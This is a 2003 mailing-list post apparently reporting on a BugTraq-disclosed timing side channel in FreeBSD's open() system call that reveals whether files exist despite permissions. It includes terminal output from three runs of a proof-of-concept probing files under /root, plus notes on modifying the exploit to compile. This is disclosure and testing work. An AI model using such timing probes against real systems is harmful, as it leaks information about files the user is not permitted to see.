freebsd security - Apr 2003 - timing related vunlerability that reveals whether files exist without regard to permissions

There was a recent post to BugTraq (April 2nd)
detailing a multi-platform vulnerability.  An archived copy of this
posting can be found at http://www.securityfocus.com/archive/1/317425.
This vulnerability is a timing based attack on system calls that can
be used to reveal whether or not a file exists without regard to
permissions.  The attack works based off the fact that using the
open() system call to test whether a file exists will return
significantly faster if the file doesn't exist (about 4 times faster
in my testing).

          This vulnerability in itself does not present a
serious security risk, however as outlined by the BugTraq post it can
be used in conjunction with another attack.  Even worse, the idea that
such a timing related vulnerability exists and that it wasn't
accounted for at all suggests that many other system calls and aspects
of various OSes (not just FreeBSD) may be vulnerable to more serious
timing related vulnerabilities.

       Call me paranoid, but in lieu of this, the ssl timing attack
(ability to derive the private key), the recent qpopper one (ability
to test to see if users exist), my daemon-sense is tingling, telling
me that there is going to be a huge flood of timing attacks over the
next few years.  One of the problems is that compensating for this is
not easy because there is no generic solution short of adding
intentional delays (like with Matt Blaze's? quantization library),
which gives you a fixed performance penalty.

TESTING DETAILS
        I ran the following commands on  a FreeBSD 4.7-RELEASE
computer using the exploit provided in the BugTraq posting.  Provided
below is 3 trial runs of the program.  Note the time discrepancy
between trying to open an existing and non-existent file.

NOTE: I needed to remove the O_SYNC flag from the "int flags" line (it
doesn't seem to exist on 4.7-R) and I needed to include the
<sys/time.h> header file in the exploit to make it work.

[njyoder@topcat ~/temp]$ uname -a
FreeBSD topcat.mine.nu 4.7-RELEASE-p6 FreeBSD 4.7-RELEASE-p6 #21: Sat Mar  1
06:07:58 EST 2003     njyoder@topcat.mine.nu:/usr/obj/usr/src/sys/TOPCAT  i386
[njyoder@topcat ~/temp]$ ./evil
[+] creating unreachable
[+] creating unreachable/iexist
[+] chmod 0'ing unreachable
[+] d---------   2 njyoder  users   512 Apr  5 17:29 unreachable/
[+] Timing open() on unreachable/iexist
        [+] Successful: 83 usecs, got m
[+] Timing open() on unreachable/non-existant
        [+] Failure: 22 usecs, got m
        [+] Using 35 as our cutoff.
[+] testing /root/.bashrc and /root/non-existant
        [+] /root/.bashrc doesn't exist (29 usecs), got m
        [+] /root/non-existant doesn't exist (21 usecs), got m
[+] cleaning up
[njyoder@topcat ~/temp]$ ./evil
[+] creating unreachable
[+] creating unreachable/iexist
[+] chmod 0'ing unreachable
[+] d---------   2 njyoder  users   512 Apr  5 17:30 unreachable/
[+] Timing open() on unreachable/iexist
        [+] Successful: 86 usecs, got m
[+] Timing open() on unreachable/non-existant
        [+] Failure: 23 usecs, got m
        [+] Using 36 as our cutoff.
[+] testing /root/.bashrc and /root/non-existant
        [+] /root/.bashrc doesn't exist (28 usecs), got m
        [+] /root/non-existant doesn't exist (22 usecs), got m
[+] cleaning up
[njyoder@topcat ~/temp]$ ./evil
[+] creating unreachable
[+] creating unreachable/iexist
[+] chmod 0'ing unreachable
[+] d---------   2 njyoder  users   512 Apr  5 17:30 unreachable/
[+] Timing open() on unreachable/iexist
        [+] Successful: 84 usecs, got m
[+] Timing open() on unreachable/non-existant
        [+] Failure: 22 usecs, got m
        [+] Using 35 as our cutoff.
[+] testing /root/.bashrc and /root/non-existant
        [+] /root/.bashrc doesn't exist (27 usecs), got m
        [+] /root/non-existant doesn't exist (20 usecs), got m
[+] cleaning up

------------------------------------------------
Nathan J. Yoder
http://www.gummibears.nu/
http://www.gummibears.nu/files/njyoder_pgp.key
------------------------------------------------